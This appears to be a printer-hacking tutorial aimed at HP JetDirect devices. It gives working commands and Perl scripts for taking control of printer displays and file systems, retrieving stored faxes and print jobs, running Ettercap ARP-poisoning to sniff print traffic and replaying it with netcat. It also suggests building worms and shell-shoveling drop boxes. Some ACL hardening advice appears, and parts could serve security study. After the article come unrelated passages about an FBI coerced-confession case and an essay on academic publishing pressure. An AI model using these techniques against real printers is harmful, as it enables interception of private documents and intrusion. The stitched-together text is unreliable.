HP Display hack -- sili@l0pht.com
Hostname : 192.168.1.14
Message : Irongeek Also
Connecting ....
Sent 59 bytes
C:\>
If you want to run it from Linux download the source code at the bottom of this section and compile it using gcc .
The syntax is the same as the Windows version .
Below is an example of how to compile and run it :
[ root@balrog root ] # gcc -o hphack hp.c
hp.c:28:12 : warning : multi-line string literals are deprecated
[ root@balrog root ] # ./hphack 192.168.1.14 " Irongeek "
HP Display hack -- sili@l0pht.com
Hostname : 192.168.1.14
Message : Irongeek
Connecting ....
Sent 54 bytes
[ root@balrog root ] #
A few ideas for messages : " Hey Baby " , " X was Here " , " I see You " , " Redrum " , " Kill " .
Enjoy .
If you like you can download Silicosis hack from one of these links :
Unix Source
Windows Source
Windows Binary
I 'm working on my own GUI version with extra features ; its web page can be found here :
http://www.irongeek.com/i.php?page=security/jetdirecthack
Unfortunately it 's pretty buggy .
The easiest tool to use may be Hijetter by FtR of Phenoelit , which is covered in the next section .
Phenoelit 's Hijetter and PFT
Hijetter seems to be the Swiss army knife of HP JetDirect hacking .
It can control a JetDirect box with PJL commands , and works even if a password is set ( at least on my HP JetDirect 300X ) .
You can download the binary and the source code for this app from :
http://www.phenoelit.de/hp/download.html
Below is a screen show of Hijetter 's interface .
To use Hijetter just type in the IP or host name of your JetDirect box and click the connect icon .
You should notice that a few of the icons at the bottom of the interface light up .
You can only use the icons that are lit up .
The first icon , from left to right , lets you control the file system on the JetDirect ( if it has one ) , the next icon lets you make changes to the settings and the last icon lets you set the text that displace on the LCD screen .
I 'll cover these tasks in reverse order since I 'm contrary like that .
Setting the LCD Display with Hijetter
1 . After you have connected to the JetDirect box click the LCD Display icon .
2 . Type in the message you want the printers LCD to display .
3 . If you check the " Failure " radio button the printer will stop printing until someone hits the ok / continue / online button on the printer , or it 's reset .
4 . Click the confirm button and your message should now appear on the printers LCD .
Changing settings with Hijetter
1 . After you have connected to the JetDirect box click the settings icon .
2 . Find the environmental variable you want to change and type in the value you want to set it to , keeping in mind the limitations listed in the " Info " panel .
3 . Use the assign button to set your change .
An M should appear next to the variable you changed .
4 . Click the confirm button and you 're done .
Using Hijetter to treat some JetDirect boxes as files / web servers
1 . After you have connected to the JetDirect box click the File System icon .
2 . Use the arrows to transfer files to and from your client to the JetDirect box .
Keep in mind that you can only transfer one file at a time with Hijetter .
3 . The New Folder and Delete icons can be used for their obvious functions .
4 . Click the confirm button and you 're done .
Finding stored faxes and print jobs on Jetdirect printers
Look around the file system and download any files that looks interesting .
Most of them do n't have obvious file extensions so open them up in a text editor and look at the headers to try and figure out what they are .
Here are a few of the things I 've found by searching around this way :
Location
What I 've found / saveDevice / DigitalSend / jobs Jpegs with names like DS000848.005 that seem to be either print jobs or Faxes .
/ FaxOut Tif files from sent Faxes / FaxIn PCL files from received Faxes .
See my NetCat and FTP tricks later for more information on how to print them .
/ Fax / act.log
Seems to be a log of phone numbers where things have be faxed to or from .
Could be useful for social engineering .
Also notice that the Hewlett - Packard LaserJet 4100 MFP we connected to has a 20 Gig hard drive , which makes for a great place to hide and serve large files .
I 've noticed on the MFP a file can be uploaded to :
/webserver /home /
and can be accessed from the printers web interface at :
http://192.168.1.4/hp/device/
For example , if you used Hijetter to upload " naughtylinuxgirls.avi " to " / webserver / home / " it can be accessed from the web with the URL :
http://192.168.1.4/hp/device/naughtylinuxgirls.avi
Feel free to put your homepage on a printer . :)
If you 're a *nix or Window command line boy , do n't despair .
The same folks from Phenoelit have provided PFT , a command line utility that can do many of the same things as Hijetter .
It can be downloaded and installed with these commands :
mkdir pjllib
cd pjllib
wget http://www.phenoelit.de/hp/libPJL-1.3-src.tgz
tar -xzf libPJL - 1.3-src.tgz
make
cd pft /
make
Here is an example of what it looks like on the command line after you bring up the help page ; look at all of the options :
Irongeek:/home/adrian/pjllib/pft# ./ pft
PFT - PJL file transfer
FX of Phenoelit < fx@phenoelit.de >
Version 0.7 ( $ Revision : 1.8 $ )
pft > help
help < command >
quit
server [ hostname ]
port [ port number ]
connect
close
env {read|print|show|set|options|changed|commit|unprotect|bruteforce}
message " Display Msg "
failure " Failure Msg "
volumes
chvol [ vol : ]
pwd
ls
cd [ directory ]
mkdir [ directory ]
rm [ file ]
get [ file ]
put [ local file ]
append [ local file ] [ file ]
lpwd
lcd [ directory ]
session
timeout [ timeout ]
pause
pft >
PFT also has some limited scripting ability by piping in commands from a text file as this example shows :
Irongeek:/home/adrian/pjllib/ pft# cat mypftscript.txt
server 192.168.31.213
connect
ls
quit
Irongeek:/home/adrian/pjllib/pft# ./pft <mypftscript.txt
PFT - PJL file transfer
FX of Phenoelit < fx@phenoelit.de >
Version 0.7 ( $ Revision : 1.8 $ )
pft > Server set to 192.168.31.213
pft > Connected to 192.168.31.213:9100
Device : HP LaserJet 4100 MFP
pft > 0 :\
. - d
.. - d
PermStore - d
PostScript - d
PJL - d
saveDevice - d
cpbLog 5227 -
Fax - d
solution - d
webServer - d
FaxOut - d
FaxIn - d
pft >
Irongeek:/home/adrian/pjllib/pft#
Since Phenoelit provides the source code it could be an interesting project to write new automated tools for extracting information from remote JetDirect boxes .
Using IP ACLs to restrict access
One of the few way that HP gives you to lock down a printer is IP ACLs ( Access Control Lists ) .
Other network printer manufactures offer similar functionality .
While the syntax may differ a little form JetDirect to JetDirect the basics are the same .
On newer JetDirects you can use the web interface to restrict what IPs can connect to the printer ( normally you just want the CUPS or Windows print server to connect ) but on most all of them you can use the Telnet interface to restrict what IPs can connect .
This log should give you an idea of how the " acl allow : ip " command is used :
Irongeek@Irongeek :~# telnet 192.168.1.22
Trying 192.168.1.22 ...
Connected to 192.168.1.22 .
Escape character is ' ^ ] ' .
HP JetDirect
Password : pass
You are logged in
Please type " ? " for HELP , or " / " for current settings
> allow:0
> quit
===JetDirect Parameters Configured===
IP Address : 192.168.1.22
Subnet Mask : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server : Not Specified
Idle Timeout : 90 Seconds
Set Cmnty Name : butt
Host Name : NPI6D47B6
Default Get Cmnty : Disabled
DHCP Config : Disabled
Passwd : Enabled
IPX / SPX : Enabled
DLC/LLC : Enabled
Ethertalk : Enabled
Banner page : Enabled
User Quitting
Connection closed by foreign host .
Irongeek@Irongeek :~# telnet 192.168.33.22
Trying 192.168.33.22 ...
Connected to 192.168.33.22 .
Escape character is ' ^ ] ' .
HP JetDirect
Password : pass
You are logged in
Please type " ? " for HELP , or " / " for current settings
> allow :192.168.19.56
> allow :192.168.20.0 255.255.255.0
> allow:list
Access Control List :
IP : 192.168.19.56 Mask : 255.255.255.255
IP : 192.168.20.0 Mask : 255.255.255.0
> quit
===JetDirect Parameters Configured===
IP Address : 192.168.33.22
Subnet Mask : 255.255.255.0
Default Gateway : 192.168.1.1
Syslog Server : Not Specified
Idle Timeout : 90 Seconds
Set Cmnty Name : butt
Host Name : NPI6D47B6
Default Get Cmnty : Disabled
DHCP Config : Disabled
Passwd : Enabled
IPX / SPX : Enabled
DLC/LLC : Enabled
Ethertalk : Enabled
Banner page : Enabled
User Quitting
Connection closed by foreign host .
Irongeek@Irongeek :~#
Notice that if we now try to attach or port scan the JetDirect from an unauthorized host no connections can be made to any of the ports : root@ScanBox : ~# nmap - A 192.168.1.22
Starting Nmap 4.00 ( http://www.insecure.org/nmap/ ) at 2006-03-16 21:30 EST
Warning : OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port
All 1672 scanned ports on 192.168.1.22 are : closed
MAC Address : 00:60 : B0:6D:47:B6 ( Hewlett - packard CO . )
Device type : general purpose|VoIP phone|broadband router|printer|print server|scanner|specialized|telecom-misc
Running : Alpha Micro AMOS , Clipcomm embedded , D - Link embedded , DEC TOPS - 20 , HP embedded , Liebert embedded , Nortel embedded , SMC embedded
Too many fingerprints match this host to give specific OS details
Nmap finished : 1 IP address ( 1 host up ) scanned in 16.921 seconds
root@ScanBox :~#
It 's generally a good idea to set up this kind of IP restriction as it can stop some forms of attack ( though not sniffing of print jobs using ARP poisoning ) .
Do n't forget to look for Stored Documents via the web interface
I 'm mostly putting this here because of the Ricoh Savins I 've played with , but it 's good advice for HP printers too .
Look for Stored Documents via the web interface on the printers you find ; many times users will save print jobs and faxes where the can be accessed from the web without even realizing it .
I 've found quite a few things this way in the past while performing audits .
Coding your own scripts with PHP , Perl and PJL
I thought some of you might be interested in writing you own scripts to change the printer display , or other tasks evolving PJL .
First , read some of the PJL references linked in the reference section , then play around with telneting in an issuing the PJL commands directly .
You will notice that there are quite a few that can be used to query the status of the printer :
Irongeek : ~# telnet 192.168.1.33 9100
Trying 192.168.1.33 ...
Connected to 192.168.1.33 .
Escape character is ' ^ ] ' .
@PJL INFO ID
@PJL INFO ID
" LASERJET 4000 "
@PJL INFO STATUS
@PJL INFO STATUS
CODE=10001
DISPLAY =" Ready "
ONLINE=TRUE
@PJL INFO PAGECOUNT
@PJL INFO PAGECOUNT
536225
@PJL INFO MEMORY
@PJL INFO MEMORY
TOTAL=2526160
LARGEST=1204208
^ ]
telnet > quit
Connection closed .
Irongeek : ~#
I decided to use Perl for my examples since its easy to use , multiplatform and pretty easy to do Sockets with .
Most *nix systems should have Perl already , if you use Windows download and install Activestate 's ActivePerl from here :
http://www.activestate.com/Products/ActivePerl/
Another useful resource is the " Printer Job Language Technical Reference Manual " which can be found at : http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf read it and learn what can be done with PJL .
Here are two links that may help you understand Perl and Socket programming : http://www.perlfect.com/articles/sockets.shtml
http://www.rocketaware.com/perl/perlipc/TCP_Clients_with_IO_Socket.htm
Here are a few quick Perl scripts .
This first one just lets you set the LCD display on a JetDirect enabled HP Printer : #!/usr/bin/perl -w
# File name : lcd.pjl.pl
# From http://www.Irongeek.com Irongeek@irongeek.com
# Script to set LCD Display an HP JetDirect printer
# Syntax : ./lcd.pjl.pl < ip-of- jetdirect >
" Some Message "
use IO :: Socket ;
$ ip = $ ARGV [ 0 ] ;
$ lcdtext = $ ARGV [ 1 ] ;
my $ sock = new IO :: Socket :: INET (
PeerAddr => $ ip ,
PeerPort => ' 9100 ' ,
Proto => ' tcp ' ,
) ;
die " Could not create socket , Monkey boy !
$ !
" unless $ sock ;
print $ sock " \e%-12345X\@PJL RDYMSG DISPLAY = \ " $ lcdtext \ "
" ;
print $ sock " \e%-12345X
" ;
close ( $ sock ) ;
Sometimes the above version does not work , so try : #!/usr/bin/perl -w
# File name : lcd.pjl.pl
# From http://www.Irongeek.com Irongeek@irongeek.com
# Script to set LCD Display an HP JetDirect printer
# Syntax : ./lcd.pjl.pl < ip-of- jetdirect >
" Some Message "
use IO :: Socket ;
$ ip = $ ARGV [ 0 ] ;
$ lcdtext = $ ARGV [ 1 ] ;
my $ sock = new IO :: Socket :: INET (
PeerAddr => $ ip ,
PeerPort => ' 9100 ' ,
Proto => ' tcp ' ,
) ;
die " Could not create socket , Monkey boy !
$ !
" unless $ sock ;
print $ sock " \@PJL RDYMSG DISPLAY = \ " $ lcdtext \ "
" ;
close ( $ sock ) ;
It would seem that sometimes the escape character ( 27 dec , 1B hex , 033 oct ) and " %- 12345X " is needed and sometimes it 's not .
It appears from my reading that it 's only needed for UEL ( Universal Exit Language ) commands .
I 'd like more details on when it has to be used and when it does not , email me if you know .
This script just sends a simple line of text to the printer directly :
#!/usr/bin/perl -w
# File name : print.pjl.pl
# From http://www.Irongeek.com Irongeek@irongeek.com
# Script to send a simple line of text to a HP JetDirect printer
# Syntax : ./print.pjl.pl < ip-of- jetdirect >
" Some Text To Print "
use IO :: Socket ;
$ ip = $ ARGV [ 0 ] ;
$ texttoprint = $ ARGV [ 1 ] ;
my $ sock = new IO :: Socket :: INET (
PeerAddr => $ ip ,
PeerPort => ' 9100 ' ,
Proto => ' tcp ' ,
) ;
die " Could not create socket , Monkey boy !
$ !
" unless $ sock ;
print $ sock $ texttoprint ;
close ( $ sock ) ;
This one does a countdown on the LCD screen , then ends with a bang :
#!/usr/bin/perl -w
# File name : selfdestructlcd.pjl.pl
# From http://www.Irongeek.com Irongeek@irongeek.com
# Script to send a count down to the printers LCD , ending in a Bang .
# Syntax : ./selfdestructlcd.pjl.pl < ip-of- jetdirect >
use IO :: Socket ;
$ ip = $ ARGV [ 0 ] ;
my $ sock = new IO :: Socket :: INET (
PeerAddr => $ ip ,
PeerPort => ' 9100 ' ,
Proto => ' tcp ' ,
) ;
die " Could not create socket , Monkey boy !
$ !
" unless $ sock ;
for ( $ i = 30 ; $ i >= 0 ; $ i --) {
print $ sock " \e%-12345X\@PJL RDYMSG DISPLAY = \ " Self Destruct in $ i \ "
" ;
print " \e%-12345X\@PJL RDYMSG DISPLAY = \ " Self Destruct in $ i \ "
" ;
sleep 1 ;
}
print $ sock " \e%-12345X\@PJL RDYMSG DISPLAY = \" Bang !!!\ "
" ;
sleep 5 ;
print $ sock " \e%-12345X\@PJL RDYMSG DISPLAY = \" Ready \ "
" ;
print $ sock " \e%-12345X
" ;
close ( $ sock ) ;
I know some of you want the script that lets you make a printer web cam like the one I had up for a short while .
You can download the PHP source code here : http://irongeek.com/downloads/printeraction.7z
If you write any interesting scripts send them to me and I 'll post them with your credits .
Happy scripting !
Fixing a busted hard drive with Ghost
Matthew Hinton ( info [ at ] fireshadow.net ) sent me some details on fixing a broken hard drive in an HP 4100 MFP with Ghost , could be useful to quite a few of you in your printer is out of warranty :
Do n't know if you'd be interested in the details for your page or not .
Where I work at we 've been able to make a ghost image of the 4100 MFP hard
drive load .
This allows us to put it on new hard drives to reinstall in
the EIO slot .
What drove us to this insanity is as follows .
We have about 10 or so of the 4100 MFP 's here .
After the warranty
expired , they started getting the same error - " 49. FF81 error " on the
display .
Pretty much it 's a new EIO hard disk .
HP has a procedure that
may or may not work to reset it .
$ 49 to talk to a tech over the phone
since it 's out of warranty .
$ 345 for a new EIO disk from HP .
Local guy
wants $ 515 to come out with a new disk to fisk it .
Taking apart the bad one , we noticed that it 's a standard Toshiba 20 Gb
laptop hard drive .
The PC tech went and got a known good EIO hard disk ,
and we made a ghost image of it .
We tried sending the ghost image back
over to the bad drive , but got a " drive too smal error " .
The ghost image
took fine on a seagate 40 Gb note book drive .
Put the seagate drive on
the controller card , reinstalled and it 's working fine .
Anyway , thanks for putting up the informative page .
I 'm using Hijetter
right now to look at the variables on the printer .
Sincerely ,
Matthew Hinton
Sniffing print jobs and replaying them
How often do folk print things and think as long as no one gets hold of the hard copy there 's no security risk ?
As it turns out , sniffing print jobs is pretty easy if you can get on the same LAN segment as the printer or print server .
Since the print jobs are not encrypted sniffing and reprinting them to your own printer is comparatively a breeze if you know how .
This example shows how to sniff between a Windows 2003 base print server and a JetDirect or Ricoh Savin based network printer that uses AppSocket ( port 9100 / tcp ) for communications , but the principles should apply to other setups as well .
1 . First we have to pull off a MitM ( Man in the Middle ) attack by ARP poisoning the JetDirect box and the Windows print server and saving the packets to a Pcap file .
I 'll use Ettercap on a Linux box to do this , but other apps may work as well .
To pull it off I will use the following Ettercap command :
ettercap - T -q -w print.dump -M ARP /192.168.1.2/ //
where 192.168.1.2 is the IP of my network printer .
Note that this will cover all of your bases , but can cause one hell of an ARP storm since Ettercap has to ARP poison every host on the subnet .
In some cases it might be better ( and faster ) to just ARP poison between two host you know the traffic will be going though .
Here is an example :
ettercap - T -q -w print.dump -M ARP /192.168.1.2/ /192.168.22.47 /
where 192.168.1.2 is the IP of the network printer and 192.168.22.47 is the ip of the Window / * nix print server or PC sending the print job .
Hit the " q " key at any time to stop the ARP poisoning and sniffing .
2 . Now that we have our Pcap ( also sometimes called a libpcap or tcpdump file ) we have to open it up in Ethereal .
Just use the File -> Open menu and point it to the print .
dump file made by Ettercap .
3 . Once print. dump has been opened in Ethereal we need to filter it .
Enter the following filter and hit Apply :
tcp.flags.syn == 1 && tcp.dstport == 9100
4 . As you see from the screen shot above the filter got rid of a lot of the extraneous data .
These four packets represent two print jobs , or at least the beginnings of them .
Packets number 158 and 159 are part of the same print job .
Packets number 510 and 511 are part the 2nd print job .
What we want to do now is right click every other packet , starting with the first , and choose " Follow TCP Stream " .
5 . Once you have chosen " Follow TCP Stream " you should see a window something like the one above .
Set the drop down box to only show the traffic destined to the network printer as shown above .
Set the data type to RAW and then click the " Save As " button and call the output file something like " test1.job " .
6. Repeat steps 4 and 5 for every other packet to get all of the print jobs captured .
7 . At this point we could open up test " test1.job " in a text editor , and if it 's a PostScript file , remove every line before :
%!PS - Adobe-3.0
and after :
%%EOF
to create a .
PS file ( PostScript ) that could be opened up in GhostView on a * nix box .
You might be able to do something similar with a PCL based print job , but I have not figured out what parts to remove yet .
As it stands we can leave " test1.job " as it is , whether it 's PCL or PostScript , and send it to the printer by replaying it with NetCat to a network printer we control .
The command is quite simple :
cat test1.job|netcat -q 0 192.168.1.2 9100
where " test1.job " is the sniffed print job we want to replay and 192.168.1.2 is a network printer that we control .
If the Netcat command seems too complex you could also just use an FTP client and FTP the captured print jobs to a JetDirect enabled printer ( assuming FTP is enabled on the JetDirect box ) .
All this seems a bit complicated I know , so I 'm thinking of asking the Cain team to add this functionality to their app to make it easier .
A note on Plain - text authentication protocols
Many of the above attacks are only possible because people do n't enable passwords on their network printers .
However , even if passwords are enabled they could still be sniffed pretty easily since most network printers use simple telnet or a web interface with out SSL to configure the system .
Both telnet and http ( with out SSL ) passwords can easily be sniffed with packages like Ettercap , Cain or Dsniff .
Some newer network printers , such as the HP Jetdirect en3700 ( J7942A ) , can use SSL with their web interface ( albeit with a self signed certificate ) and the interface seems to be more that just a Java applet for using SNMP to control the Jetdirect .
This is a much more secure option than the older Jetdirects that used unencrypted HTTP and SNMP v1 / v2 .
Other Ideas
There 's still a lot more out there I need to research and play with when it comes to hacking network printers .
As with most of my projects this is a work in progress so feel free to email me your ideas .
A few interesting topics might be :
Using Phenoelit's ChaiServices information to create worms , backdoor and other malware for HP JetDirect printers .
Modifying the PFT source code to make automated apps for searching an IP space and pulling files off of the network printers .
Vulnerabilities in network printer implementation like buffer overflows and such .
Hacking the firmware in JetDirects to create dial home ( shell shoveling ) drop boxes that could be left behind on target networks to help with intrusions .
For those wanting to help install the HP Download Manager and look in " C: \Program Files \Hewlett - Packard \HP Download Manager \Upgrades\jetdirect " for the vendor firmwares .
Tracking Dots : http://www.eff.org/Privacy/printers/list.php
Also do n't forget to check out SecurityFocus ' online vulnerabilities database ( http://www.securityfocus.com/) to see if your particular network printers have any outstanding issues .
I know they have a few issues listed for some of the JetDirect boxes .
While you 're at it , check for vulnerabilities in the base OS that the network printer uses , VxWorks in the case of some JetDirects and NetBSD for the Ricoh Savins .
I hope you have found this article interesting .
If you have any ideas or comments please feel free to e-mail me .
Happy printer hacking .
Links to Tools :
HP Web JetAdmin ( without registering )
http://www.svrops.com/svrops/dwnldprog.htm
HP JetAdmin for Window 2000 3.42 , the last version to be released
http://www.helpdesk.umd.edu/os/windows_nt/printing/674/
HP Download Manager ( for upgrading firmware )
http://www.hp.com/go/dlm_sw
Ghostscript , Ghostview and GSview
http://www.cs.wisc.edu/~ghost/
SmartDeviceMonitor
http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=
19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=
Device%20 Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA
Foundstone 's SNScan ( find network printers that use SNMP , which seems to be most of them )
http://www.foundstone.com/resources/proddesc/snscan.htm
SoftPerfect 's NetScan ( also useful for scanning for SNMP services )
http://www.softperfect.com/products/networkscanner/
Silicosis ' HP Printer Display Hack
http://www.irongeek.com/i.php?page=security/hphack
Irongeek 's GUI HP Printer Display Hack
http://www.irongeek.com/i.php?page=security/jetdirecthack
IPIterator
http://www.irongeek.com/i.php?page=security/ipiterator
Hijetter
http://www.phenoelit.de/hp/download.html
Ettercap
http://ettercap.sourceforge.net/
Ethereal
http://www.ethereal.com/
NetCat
http://netcat.sourceforge.net/
Net-SNMP
http://net-snmp.sourceforge.net/
Media :
Here 's a collection of videos and other media on Network Printer Hacking you might be interest in :
Network Printer Hacking : Irongeek 's Presentation at Notacon 2006
http://irongeek.com/i.php?page=videos/notacon2006printerhacking
Slide and other resources from the above presentation
http://irongeek.com/downloads/notacon2006.zip
Infonomicon TV Ep 7
http://irongeek.com/i.php?page=videos/infonomicontv7
Useful links for further research :
Common print server port numbers
http://members.cruzio.com/~jeffl/sco/lp/printservers.htm
HP 's guide to securing JetDirect printers
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999
Understanding , Reversing , and Hacking HP Printers by Slobotron
http://www.searchlores.org/realicra/hp_slobo.htm
SecurityFocus ' online vulnerabilities database
http://www.securityfocus.com/
Network Printers and Other Peripherals -- Vulnerabilities and Fixes by Dennis Mattison ( Littlew0lf )
http://members.cox.net/ltlw0lf/printers/index.html
older version : http://freshmeat.net/articles/view/445/
Securing Network Print Jobs - An LRS White Paper
http://www.lrs.com/EOM/Solutions/Papers/secure.aspx
Printer Job Language Technical Reference Manual
http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf
Printers , Proxies and Pranksters An April Fool 's Recipe for Fun by Kellegous
http://web.kellegous.com/scratch/2003/printers1KBXB/
RICOH Aficio 2035 " security ' ' by mslaviero
http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/
Special thanks to Nancy for proof reading and making my English intelligible .
Change Log
02/06/2007 : I 've updated info on the fix for the Pharos cached print job vulnerability
01/20/2007 : HP seems to have released a fix for the FTP DoS problem .
See the Printer DoSing section .
01/10/2007 : Fixed and added some links in the Printer DoSing section .
01/06/2007 : Add information on the Joxean Koret attack to the Printer DoSing section .
04/18/2006 : Added link to a newer version of Littlew0lf 's article .
04/10/2006 : Added Media section .
04/02/2006 : Added a bunch of information for my presentation at Notacon 2006
01/18/2006 : Added section on Fixing a busted hard drive with Ghost .
09/14/2005 : Found another missing image , the LCD Display icon from Hijetter .
It 's fixed now .
I also added a link suggested by Dick from Hack A Day .
09/14/2005 : Hack A
Day added a link to this site and I noticed that the Hijetter file system image was broken .
It should be fixed now .
09/13/2005 : Added " Coding your own scripts with Perl and PJL " section .
09/11/2005 : First posted .
Irongeek 's Notes For Later :
nano /etc/ init.d/sysklogd
-r
LAND attacks
Blackandy says :
Long story short : Man is staying in hotel in NYC during the 9/11/2001 attacks .
Hotel empties after attacks and device is found in man 's hotel room closet that allows communication with airline pilots .
Man is Egyptian national , and FBI questions him .
Man denies owning device .
FBI agent threatens that man 's family will be tortured in Egypt .
Man confesses , ultimately spending a month in jail before airline pilot shows up at hotel asking for radio left in man 's room back .
Whoops !
Lawsuits ensue .
From Steve Bergstein's Psychosounds blog , where I found this :
" Higazy then realized he had a choice : he could continue denying the radio was his and his family suffers ungodly torture in Egypt or he confesses and his family is spared .
Of course , by confessing , Higazy 's life is worth garbage at that point , but … well , that 's why coerced confessions are outlawed in the United States . "
Good thing the FBI does n't do this any more .
Right ?
We never would have known any of this as the US Court of Appeals in Manhattan redacted the description of the torture threats in its decision , but someone posted an unredacted decision on the web for a brief time .
And a PDF of that is what 's making the rounds now .
Here 's the link to a story on the situation from the ABA Journal .
In it , the court claims it redacted the information about the torture threats to protect Higazy and his family .
The story does n't say what they 're being protected from .
Recently there has been some discussion in the blogosphere about student - advisor relationships in science .
Some of this has been triggered by the article by Peter Lawrence in Current Biology ( The mismeasurement of science ) and some by the recent reports in Nature ( here and here ) regarding the comparatively low numbers of academic positions relative to the number of new PhDs ( and be sure to see also Larry Moran 's slightly different and perhaps more realistic take on this ) .
One of the recurring topics is the pressure that is often put on graduate students by their advisors to publish .
Often this seems to be interpreted in a very negative way , with the advisor supposedly viewing students as little more than data - generating and paper - authoring machines ( or " indentured labour " , according to one of the Nature articles ) to be exploited for their own gain .
As an advisor , I want to provide some alternative explanations that are not based on such nefarious motives .
At the base of this discussion is the assumption that most advisors actually do encourage / pressure their students to publish -- an assumption with which I will not disagree here .
What remains open is the interpretation of why this might occur .
There are several possibilities :
1 ) The advisor does no real lab work himself and brings in graduate students as " cheap , well - trained labour " ( as one Nature author put it ) .
I am sure this happens , especially in some larger groups , but this is not the case in my lab .
In fact , one wonders how the students come already well trained .
As an advisor , it can eat up an enormous amount of time and energy -- which could easily be spent writing more papers by oneself -- to render graduate students sufficiently competent and confident that one can trust their data as though one had acquired them oneself .
Indeed , I resent the insinuation that advisors are self - centred egomaniacs with no regard for student well - being .
I take my responsibilities as an advisor very seriously , I care a great deal about the success of my students as individuals , and I work hard to foster an attitude of " my success is your success and vice versa " in the lab .
It 's possible that the old joke about lawyers ( " 99 % of them give the rest a bad name " ) applies to advisors , but I do not believe that this is nearly as ubiquitous as it is made out to be .
So , leaving behind the standard interpretation which I strongly reject , let us consider some other possibilities .
2 ) Advisors need their students to publish so that they can get funds to train more students .
Like it or not , publications coming out of a lab represent a major criterion for whether applications for funding will be supported .
No publications , no money .
No money , no students .
Instead of being a result of megalomania , the pressure put on students to publish can also be the result of a desire to be able to accept eager students into one 's lab rather than turning them away .
Current students are supported by funds acquired through the labour of others ( previous students and / or the advisor ) , and their efforts indirectly can open possibilities for future students .
Think of it as a kind of intergenerational reciprocity .
3 ) Students want to publish , and the advisor makes sure that they stay on track to accomplish this .
Most of the graduate and undergraduate students with whom I have worked directly have been quite excited by the possibility of seeing their names in print on a high quality piece of work .
I would never discourage this , and in fact I do my best to guide them in their research so that in the end it will meet the standards necessary for publication .
That may mean extra work well beyond what is required for their course or degree -- but I make a point of screening students as best I can to only accept those who aim higher than the average expectation .
It also means that I have to hold the student to a higher standard and to keep the pressure on at times so that their goal of publishing ( which of course I share ) is achieved .
4 ) The advisor can easily write single - author papers but wants to write papers with his students .
As with many other advisors , I could easily spend more time working on papers alone or with other PIs .
There is something special about writing a paper with a student , however , especially if it is the student 's first .
It 's probably not unlike the excitement of taking a young child to his or her first sporting event , movie , or other activity that a parent has done dozens or hundreds of times and which no longer has that same sparkle of novelty .
It is always enjoyable to experience something again for the first time .
I remember very well writing my first paper and the excitement of seeing it in print .
The only way an advisor can feel that again is to go through it with a new student .
In this scenario , students may not quite know how to get a publishable piece of work finished , or may not be thinking that far ahead , but the advisor knows they will be thrilled to have a paper in the end and keeps the pressure on so that it remains a possibility .
5 ) Publishing will help students who go on in science .
It is a given at this point that having publications is necessary for students to be competitive for future graduate student positions , postdocs , scholarships , fellowships , and eventually jobs .
It makes little sense to wait until the end of one stage to publish ( e.g. , writing up all one 's data from one 's PhD as a postdoc ) , and it is far more beneficial to have established at least something of a CV before one starts looking for the next position .
Advisors who care about their students ' futures will therefore keep the pressure on for them to do high quality work and to put in the effort to publish before they leave the lab .
6 ) Publishing will help students who do not go on in science .
There is sometimes an implicit assumption that students who plan to go on in science should be treated rather differently from those who do not .
Encouraging them to publish commonly falls into this category .
Let me point out , however , that not all students know if they want to go on at any given moment ( such that these are not discrete categories ) .
This is especially true in systems as in Canada where the MSc and PhD are usually done separately but both involve intensive research projects ; some students use the MSc to determine whether they can / want to move on to a PhD .
More importantly , it should be obvious that doing work of sufficient quality to warrant publication will help a student no matter what their career ambitions .
Why ?
First , because it shows that while they were in science , they conducted their work at a level high enough to pass peer review and to get into print .
Surely a potential employer would recognize this as an indication of intellect , work ethic , and ambition even if lab work , analysis , and writing are not part of the job for which a former student is applying .
Second , because inevitably the student will be asking the former advisor for letters of recommendation in the future .
If the student has done high caliber work that has been published , the advisor can feel confident recommending her .
Whenever possible , I would very much like to be able to write letters about my students like " She went well beyond the normal expectations of her program and completed work of such high quality that it was published as several papers in top journals . "
7 ) If students and advisors are going to invest the time , then the work should be done at a publishable level .
Advisors have very little free time .
If they are going to invest it in writing grants to support a student 's research and spend the time training students in the methods and analytical approaches of their discipline , going over proposals , attending committee meetings , and generally ensuring that a student has everything he needs to do his research , then there is a reasonable expectation that , in return , the work will be done at a high level .
It also makes sense that if the student himself will be investing months or years on a project , that it should be done at a level worthy of publication .
Both the advisor and the student win in that case , and the time will have been well invested by both .
Making sure that this is true may , of course , involve pressure from the advisor .
( I hope you will forgive a small digression at this point .
I do n't know how common the misconception is ( perhaps it is higher among students ? ) , but advisors are not lazy .
Most university faculty work very long hours and are chronically overwhelmed with dozens of duties and commitments .
No , they generally do not spend very much time in the lab ( anymore ) , but this is because they are busy writing grants , teaching courses , giving seminars , attending committee meetings , reviewing papers , and juggling countless other tasks -- many of which they consider far less appealing than the lab work that they did as students and postdocs .
To have landed one of the scarce faculty jobs , they must not only have done substantial research of their own , they must have risen above the competition in this and other regards .
This does not give them permission to view students as data - producing robots ( even if they themselves were treated as such ) , but it does earn them some slack from anybody who might otherwise resent that the boss is n't at the bench very often . )
8 ) If data are not published , they might as well not exist as far as the pool of human knowledge is concerned .
Data that would otherwise be considered interesting , novel , and important mean nothing if no one knows about them .
And if they are never published , then effectively they might as well not exist .
The goal of science to expand human knowledge should , in itself , be enough to inspire students to want to publish , but in case that is not enough , there are several practical reasons that students should be expected to generate publication - quality work .
One , taxpayers fund most of the research that gets done in academic labs , and they have a right to expect a return on their investment .
This does not mean that all science must be done for some specific applied reason , but it does mean that it should not be done solely for the sake of personal interest or in the pursuit of a degree .
Two , everyone benefits from scientific knowledge , but unlike most individuals , students have an opportunity to add to it as well -- so long as they make their results widely available .
As one professor I know puts it with tongue partly in cheek , " unless you actually contribute something to human understanding of the world , you are a parasite on those who do " .
Three , not publishing means that other students may waste their time in other labs , trying to develop the same methodologies and making the same mistakes , because they were unaware of the work that had been accomplished already .
It is also the case that other students may replicate work that has already been completed rather than expanding on it or focusing on some other issue in need of study .
Not publishing essentially means that new knowledge produced by students is lost , and the advisor has a responsibility to prevent this if at all possible .
The point here is that there are many positive reasons why students should aim to publish and why this should be encouraged and expected by their advisors .
